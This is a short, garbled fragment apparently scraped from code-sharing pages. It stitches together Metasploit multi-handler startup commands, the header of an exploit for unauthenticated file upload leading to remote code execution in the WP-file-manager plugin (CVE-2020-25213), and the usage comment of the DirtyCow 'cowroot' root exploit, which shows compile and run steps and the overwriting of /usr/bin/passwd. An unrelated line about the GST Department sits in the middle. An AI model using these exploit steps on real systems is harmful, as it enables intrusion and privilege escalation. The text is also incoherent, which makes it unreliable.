| Host IP |
|---|
192.168.100.1 |
service postgresql start
sudo msfdb start
msfconsole -qr /home/siddicky/tools/multi-handler.rc| #!/usr/bin/env | |
| # Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE | |
| # Date: [ 22-01-2023 ] | |
| # Exploit Author: [BLY] | |
| # Vendor Homepage: [https://wpscan.com/vulnerability/10389] | |
| # Version: [ File Manager plugin 6.0-6.9] | |
| # Tested on: [ Debian ] | |
| # CVE : [ CVE-2020-25213 ] |
Context - For professionals working in the GST Department.
| /* | |
| * (un)comment correct payload first (x86 or x64)! | |
| * | |
| * $ gcc cowroot.c -o cowroot -pthread | |
| * $ ./cowroot | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * Size of binary: 57048 | |
| * Racing, this may take a while.. | |
| * /usr/bin/passwd overwritten |